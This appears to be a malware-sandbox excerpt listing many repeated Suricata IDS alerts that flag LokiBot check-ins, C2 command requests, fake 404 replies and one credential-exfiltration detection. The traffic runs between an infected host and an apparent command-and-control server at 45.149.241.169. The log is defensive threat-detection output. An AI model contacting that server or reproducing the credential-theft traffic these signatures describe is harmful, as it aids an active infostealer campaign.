Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49749 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49744 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49749 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49756
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49718
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49717 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49735 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49757 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49735 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49757 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49708 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49764 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49761 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49767 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49734 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49720 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49767 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49733 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49761 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49753 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49753 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49744 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49741 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49741 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49741 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49717 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49744 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49764 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49734 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49720 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49720 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49759 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49761 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49761 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49758 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49743 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49733 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49746 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49736 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49757 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49752 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49761
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49708 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49708 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49749 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49734 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.10:49708 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49720 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49733 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49725 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49746 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49735
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49730 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49746 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49723 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49733 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49723 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49733 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49730 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49752 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49752 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49730 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49716 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49716 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49716 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49725 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49752 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49716 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49725 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49716 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49717
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49760 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49741 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49741 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49742 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49719 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49742 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49759 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49760 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49730 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49752 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49760
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49730 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49734 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49716
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49734 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49746 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49746 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49721 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49721 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49719 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49721 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49719 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49730
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49742 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49746
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49758 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49758 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49764
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49739 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49742 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49758 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49742 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49739 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49737 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49754 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49749 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49742
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49757 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49741
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49744
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49721 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49719 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49719 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49719
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49788 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49788 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49788 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49720 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49788 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49788 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49743 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49743 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49733
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49758 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49743 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49722 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49755 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49743 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49754 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49751 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49758
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49751 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49751 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49797 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49725
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49732 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49795 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49795 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49732 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49795 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49736 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49721 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49736 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49767
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49751 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49788
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49751 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49781 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49720
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49800 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49736 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49800 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49800 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49743
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49736 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49754 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49737 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49800 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49800 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49773 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49755 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49751
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49755 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49774 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49774 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49774 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49795 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49723 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49795 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49715 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49739 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49754 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49732 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49721
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49781 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49754 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49804 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49732 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49732 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49800
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49792 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49723 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49737 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49774 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49723 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49755 -> 45.149.241.169:80
